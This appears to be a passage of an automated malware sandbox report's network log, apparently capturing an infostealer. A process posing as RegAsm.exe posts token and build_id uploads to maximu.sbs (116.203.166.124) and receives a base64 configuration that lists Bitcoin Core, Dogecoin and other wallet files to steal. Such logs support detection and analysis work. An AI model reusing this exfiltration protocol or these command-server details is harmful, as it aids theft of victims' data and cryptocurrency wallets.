                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          19192.168.2.449774116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----mgvs0hvs2v3w4e3euk6p
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 73 30 68 76 73 32 76 33 77 34 65 33 65 75 6b 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------mgvs0hvs2v3w4e3euk6pContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------mgvs0hvs2v3w4e3euk6pContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------mgvs0hvs2v3w4e3euk6pCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:32 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:34 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          20192.168.2.449775116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:34 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5xtjwtj5fuk68qq16f3o
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 35 78 74 6a 77 74 6a 35 66 75 6b 36 38 71 71 31 36 66 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 35 78 74 6a 77 74 6a 35 66 75 6b 36 38 71 71 31 36 66 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 35 78 74 6a 77 74 6a 35 66 75 6b 36 38 71 71 31 36 66 33 6f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------5xtjwtj5fuk68qq16f3oContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------5xtjwtj5fuk68qq16f3oContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------5xtjwtj5fuk68qq16f3oCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:35 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:35 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          21192.168.2.449776116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
